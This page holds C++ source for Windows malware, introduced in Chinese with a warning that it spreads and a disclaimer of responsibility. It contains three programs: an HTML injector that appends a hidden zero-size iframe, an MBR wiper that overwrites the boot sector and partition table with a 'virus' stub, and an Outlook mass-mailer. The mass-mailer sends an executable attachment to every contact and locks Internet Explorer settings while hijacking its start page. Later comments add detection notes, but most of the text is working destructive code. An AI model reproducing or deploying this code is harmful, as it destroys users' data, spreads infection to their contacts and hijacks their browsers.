要运行该 C++ 程序,需要先把它编译成 exe。如果要感染,需要把它放到 D://Backup;我并不建议这么做,因为它会传染!如果要在虚拟机上运行,需要断网,不然会传染到别的电脑上。但凡使用,后果自负!
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
// Appends a fixed HTML snippet to the end of an existing file.
//
// The snippet is a CRLF followed by an <iframe> with width=0 and height=0,
// i.e. a frame that loads its src URL without being visible on the page.
// For defenders: a zero-sized iframe appended after the end of an HTML
// document is the artifact this routine leaves behind; file-integrity
// monitoring on served HTML files and a scan for trailing zero-dimension
// iframes will surface it.
//
// filepath: path of the file to modify. It is opened with "rb+", so the file
//           must already exist and is not truncated.
// Returns false if the file cannot be opened, true otherwise. The results of
// fseek and fwrite are not checked, so true does not prove the append happened.
bool inject(char *filepath)
{
char url[]="\r\n<iframe src=http://www.baidu.com/ width=0 height=0></iframe>";
FILE *fp;
fp=fopen(filepath,"rb+");
if(fp==NULL)
{
return false;
}
// Move to the end so the existing content is left intact and the snippet is appended.
fseek(fp,0,SEEK_END);
// strlen excludes the terminating NUL, so only the visible markup is written.
fwrite(url,sizeof(char),strlen(url),fp);
fclose(fp);
return true;
}
// Sets the text attribute of the process's standard-output console.
//
// ForeColor and BackGroundColor are OR-ed together as given (no shifting) and
// passed to SetConsoleTextAttribute. Both parameters have default values
// (3 and 0), so the function can be called with no arguments.
void setColor(unsigned short ForeColor=3,unsigned short BackGroundColor=0)
{
    const WORD attributes = static_cast<WORD>(ForeColor | BackGroundColor);
    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), attributes);
}
// Prints a message to the console in a colour chosen by severity level.
//
// s:     NUL-terminated text, printed verbatim through "%s".
// level: 1 = green, 2 = yellow (attribute 6), 3 = red; 0 and every other
//        value = white (attribute 7).
// The console colour is left at the selected value after the call.
void OutPutDebugInfo(char *s,int level=0)
{
    unsigned short foreground;
    switch (level)
    {
    case 1:
        foreground = FOREGROUND_GREEN; // green
        break;
    case 2:
        foreground = 6;                // yellow
        break;
    case 3:
        foreground = FOREGROUND_RED;   // red
        break;
    default:
        foreground = 7;                // white; level 0 lands here as well
        break;
    }
    setColor(foreground, 0);
    printf("%s", s);
}
// Entry point of the first program on this page: runs inject() once against
// the hard-coded path c:\test.htm and reports the result on the console.
// argc and argv are not used. The program waits for a key press before exiting.
int main(int argc, char* argv[])
{
if(!inject("c:\\test.htm"))
{
// Level 3 prints in red; inject() returns false only when the file could not be opened.
OutPutDebugInfo("Inject Error\n",3);
}else
{
OutPutDebugInfo("Inject success\n");
}
//OutPutDebugInfo("Inject success\n");
// Keep the console window open until the user presses a key.
getchar();
return 0;
}
#include "StdAfx.h"
#include <windows.h>
#include <winioctl.h>
// Forward declaration; the definition follows below.
int killMBR();
// GUI entry point of the second program on this page. It shows a message box
// and then calls killMBR() unconditionally: there is no confirmation step,
// the box only has to be dismissed. None of the WinMain parameters are used.
// killMBR() calls ExitProcess on its success path, so the return below is
// reached only when killMBR() returns early with an error.
int APIENTRY WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd )
{
MessageBox(NULL,"Fuck MBR!","Fuck!",0);
killMBR();
return 0;
}
// Replacement boot-sector content. The bytes read as a short 16-bit real-mode
// stub that uses BIOS interrupt 0x10 (video services) to display the ASCII
// text embedded at the end of the array ("I am virus! ...") and then spins.
// It contains no code to load an operating system.
unsigned char scode[]="\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
// Builds a 512-byte sector image from scode and writes it through a device
// handle, then terminates the process.
//
// What the code does, for analysts:
//  - The buffer is zero-initialised, so every byte between the stub and the
//    0x55 0xAA signature is zero. On an MBR-partitioned disk that range holds
//    the partition table, so a successful write destroys it together with the
//    original boot code.
//  - The return values of DeviceIoControl and WriteFile are ignored; the
//    function cannot tell whether anything was written.
//  - The only error path is a failed CreateFile, which returns -1 before any
//    write is attempted.
//
// Defensive notes: writable access to a raw disk device is normally limited
// to administrators, so running users without elevation blocks this path.
// A non-system process requesting GENERIC_WRITE on a \\.\PhysicalDrive-style
// device is a strong detection signal. Recovery relies on a backup of the
// first sector / partition table.
//
// Returns -1 if the device cannot be opened. Otherwise the process exits with
// code -1 via ExitProcess and the function never returns.
int killMBR()
{
HANDLE hDevice;
DWORD dwBytesWritten,dwBytesReturned;
BYTE pMBR[512]={0};
memcpy(pMBR,scode,sizeof(scode)-1);// rebuild the sector image; -1 drops the literal's trailing NUL
// Boot signature expected in the last two bytes of a boot sector.
pMBR[510]=0x55;
pMBR[511]=0xAA;
// Request read/write access to the device path named in the literal.
hDevice=CreateFile("\\\\.\\PHYSICALDRIVEO",
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,OPEN_EXISTING,0,NULL);
if(hDevice==INVALID_HANDLE_VALUE)
{
return -1;
}
// Lock request issued before the write; its result is not inspected.
DeviceIoControl(hDevice,FSCTL_LOCK_VOLUME,NULL,0,NULL,0,
&dwBytesReturned,NULL);
WriteFile(hDevice,pMBR,sizeof(pMBR),&dwBytesWritten,NULL);// write the 512-byte image at the handle's current offset (0 for a freshly opened handle)
DeviceIoControl(hDevice,FSCTL_UNLOCK_VOLUME,NULL,0,NULL,0
,&dwBytesReturned,NULL);
CloseHandle(hDevice);
ExitProcess(-1);
// Unreachable: ExitProcess does not return.
return 0;
}
#include <iostream>
#include <windows.h>
#include <comdef.h>
#include <comutil.h>
#include <atlbase.h>
#include <atlcom.h>
#include <Outlook.h>
#pragma comment(lib, "comsuppw.lib")
// Writes a REG_DWORD value under an existing registry key.
//
// hKeyRoot:  predefined root key handle.
// subKey:    path of the key below hKeyRoot; it is opened, never created.
// valueName: name of the value to set.
// data:      32-bit value to store.
//
// If the key cannot be opened with KEY_SET_VALUE access, nothing is written
// and a message goes to stderr. The result of RegSetValueEx is not checked.
// NOTE(review): subKey is a wide string sent to the narrow std::cerr stream,
// so the message presumably shows a pointer value rather than the key name.
void SetRegistryValue(HKEY hKeyRoot, LPCWSTR subKey, LPCWSTR valueName, DWORD data) {
    HKEY openedKey;
    const LONG status = RegOpenKeyEx(hKeyRoot, subKey, 0, KEY_SET_VALUE, &openedKey);
    if (status != ERROR_SUCCESS) {
        std::cerr << "Failed to open registry key: " << subKey << std::endl;
        return;
    }

    const BYTE* rawValue = reinterpret_cast<const BYTE*>(&data);
    RegSetValueEx(openedKey, valueName, 0, REG_DWORD, rawValue, sizeof(data));
    RegCloseKey(openedKey);
}
// Writes a REG_SZ (string) value under an existing registry key.
//
// hKeyRoot:  predefined root key handle.
// subKey:    path of the key below hKeyRoot; it is opened, never created.
// valueName: name of the value to set.
// data:      NUL-terminated wide string to store. The byte count passed to
//            the API includes the terminator.
//
// If the key cannot be opened with KEY_SET_VALUE access, nothing is written
// and a message goes to stderr. The result of RegSetValueEx is not checked.
// NOTE(review): subKey is a wide string sent to the narrow std::cerr stream,
// so the message presumably shows a pointer value rather than the key name.
void SetRegistryStringValue(HKEY hKeyRoot, LPCWSTR subKey, LPCWSTR valueName, LPCWSTR data) {
    HKEY openedKey;
    const LONG status = RegOpenKeyEx(hKeyRoot, subKey, 0, KEY_SET_VALUE, &openedKey);
    if (status != ERROR_SUCCESS) {
        std::cerr << "Failed to open registry key: " << subKey << std::endl;
        return;
    }

    const BYTE* rawText = reinterpret_cast<const BYTE*>(data);
    RegSetValueEx(openedKey, valueName, 0, REG_SZ, rawText, (lstrlen(data) + 1) * sizeof(wchar_t));
    RegCloseKey(openedKey);
}
// Entry point of the third program on this page. It does two things in order:
//
//  1. Through Outlook COM automation it walks every entry of the first
//     address list and sends each one a mail carrying the file
//     D:\Backup\Win32system.exe as an attachment (mass-mailing propagation).
//  2. It writes a series of Internet Explorer / Explorer policy values under
//     HKEY_CURRENT_USER and a "Start Page" string under HKEY_USERS\.DEFAULT.
//
// Indicators visible in this code, for detection and triage:
//  - mail subject "Why are you so foolish?" with attachment "Win32system.exe"
//  - file path D:\Backup\Win32system.exe
//  - start-page URL http://liudemin.myetang.com
//  - DWORD value 1 written to the names listed at the end of this function
//    under Software\Policies\Microsoft\Internet Explorer\... and
//    Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
//
// Defensive notes: blocking executable attachments at the mail gateway and
// keeping Outlook's programmatic-access protection enabled both break step 1;
// auditing writes to the policy keys above surfaces step 2.
//
// Returns 1 if any Outlook object needed before the send loop cannot be
// obtained, 0 otherwise. Failures inside the loop only skip that recipient.
int main() {
CoInitialize(NULL);
// Create Outlook application
CComPtr<Outlook::_Application> pApp;
HRESULT hr = pApp.CoCreateInstance(__uuidof(Outlook::Application));
if (FAILED(hr)) {
std::cerr << "Failed to create Outlook instance." << std::endl;
CoUninitialize();
return 1;
}
// Get the MAPI namespace
CComPtr<Outlook::_NameSpace> pNamespace;
hr = pApp->GetNamespace(L"MAPI", &pNamespace);
if (FAILED(hr)) {
std::cerr << "Failed to get MAPI namespace." << std::endl;
CoUninitialize();
return 1;
}
// Get the AddressLists
CComPtr<Outlook::AddressLists> pAddressLists;
hr = pNamespace->get_AddressLists(&pAddressLists);
if (FAILED(hr)) {
std::cerr << "Failed to get AddressLists." << std::endl;
CoUninitialize();
return 1;
}
// Get the first AddressList
CComPtr<Outlook::AddressList> pAddressList;
hr = pAddressLists->Item(1, &pAddressList);
if (FAILED(hr)) {
std::cerr << "Failed to get first AddressList." << std::endl;
CoUninitialize();
return 1;
}
// Get the AddressEntries
CComPtr<Outlook::AddressEntries> pAddressEntries;
hr = pAddressList->get_AddressEntries(&pAddressEntries);
if (FAILED(hr)) {
std::cerr << "Failed to get AddressEntries." << std::endl;
CoUninitialize();
return 1;
}
// Number of entries in the list; the HRESULT of get_Count is not checked.
long count;
pAddressEntries->get_Count(&count);
// One mail per address entry; the loop index starts at 1.
for (long x = 1; x <= count; ++x) {
CComPtr<Outlook::AddressEntry> pAddressEntry;
hr = pAddressEntries->Item(x, &pAddressEntry);
if (FAILED(hr)) {
std::cerr << "Failed to get AddressEntry at index " << x << "." << std::endl;
continue;
}
CComPtr<Outlook::MailItem> pMailItem;
hr = pApp->CreateItem(Outlook::olMailItem, (IDispatch**)&pMailItem);
if (FAILED(hr)) {
std::cerr << "Failed to create MailItem." << std::endl;
continue;
}
CComBSTR address;
hr = pAddressEntry->get_Address(&address);
if (FAILED(hr)) {
std::cerr << "Failed to get address." << std::endl;
continue;
}
// Fixed subject and body: these literals are usable as content-filter signatures.
pMailItem->put_To(address);
pMailItem->put_Subject(L"Why are you so foolish?");
pMailItem->put_Body(L"Here is a document explaining why you are foolish!!!");
// Attach the file
CComPtr<Outlook::Attachments> pAttachments;
hr = pMailItem->get_Attachments(&pAttachments);
if (FAILED(hr)) {
std::cerr << "Failed to get attachments." << std::endl;
continue;
}
// The attachment is read from a fixed local path and shown as "Win32system.exe".
CComVariant filePath(L"D:\\Backup\\Win32system.exe");
hr = pAttachments->Add(&filePath, Outlook::olByValue, 1, CComVariant(L"Win32system.exe"));
if (FAILED(hr)) {
std::cerr << "Failed to add attachment." << std::endl;
continue;
}
// Send the email
hr = pMailItem->Send();
if (FAILED(hr)) {
std::cerr << "Failed to send email." << std::endl;
}
}
// Quit Outlook
pApp->Quit();
CoUninitialize();
// Set registry values
// Every DWORD below is set to 1. Judging by the value names these are
// Internet Explorer restriction policies (context menu, options dialog,
// save-as, file-open, control-panel tabs); their effect is not shown here.
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions", L"NoBrowserContextMenu", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions", L"NoBrowserOptions", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions", L"NoBrowserSaveAs", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions", L"NoFileOpen", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"Advanced", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"Cache Internet", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"AutoConfig", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"HomePage", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"History", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"Connwiz Admin Lock", 1);
// The only string value: the browser start page, written under HKEY_USERS\.DEFAULT rather than HKEY_CURRENT_USER.
SetRegistryStringValue(HKEY_USERS, L".DEFAULT\\Software\\Microsoft\\Internet Explorer\\Main", L"Start Page", L"http://liudemin.myetang.com");
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"SecurityTab", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel", L"ResetWebSettings", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions", L"NoViewSource", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Policies\\Microsoft\\Internet Explorer\\Infodelivery\\Restrictions", L"NoAddingSubscriptions", 1);
SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", L"NoFileMenu", 1);
return 0;
}